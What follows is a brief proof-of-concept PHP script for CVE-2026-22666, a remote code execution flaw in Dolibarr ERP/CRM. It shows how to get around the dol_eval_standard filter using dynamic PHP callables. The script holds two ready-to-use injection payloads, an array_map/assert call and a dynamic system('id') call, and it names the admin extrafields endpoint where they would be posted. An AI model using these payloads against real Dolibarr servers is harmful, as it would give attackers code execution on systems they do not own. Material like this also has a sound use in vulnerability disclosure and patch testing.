CVE-2026-22666 Dolibarr ERP/CRM 远程代码执行漏洞

<?php /* * PoC for CVE-2026-22666 * Demonstrates bypassing dol_eval_standard using PHP dynamic callable syntax. * Requires administrator privileges to inject payload into computed extrafields. */ // The vulnerable function dol_eval_standard() fails to block dynamic callables. // Attackers can inject payloads into extrafields that are eventually evaluated. // Example Payload 1: Using array_map to obfuscate the call // This bypasses simple string checks for 'eval' or 'system' by using a callback. $payload = "array_map('assert', array('phpinfo();'))"; // Example Payload 2: Dynamic function call via variable // This bypasses whitelist checks that look for direct function names. $func = 'system'; $cmd = 'id'; $payload_dynamic = "$func('$cmd')"; // In the exploit scenario, these payloads would be sent via POST request // to the endpoint handling extrafields configuration (e.g., /admin/extrafields.php). // When the extrafield is rendered or processed, dol_eval_standard runs eval($payload). echo "Potential Malicious Payload for Extrafield:\n"; echo $payload . "\n"; echo "\nOr Dynamic Syntax:\n"; echo $payload_dynamic . "\n"; ?>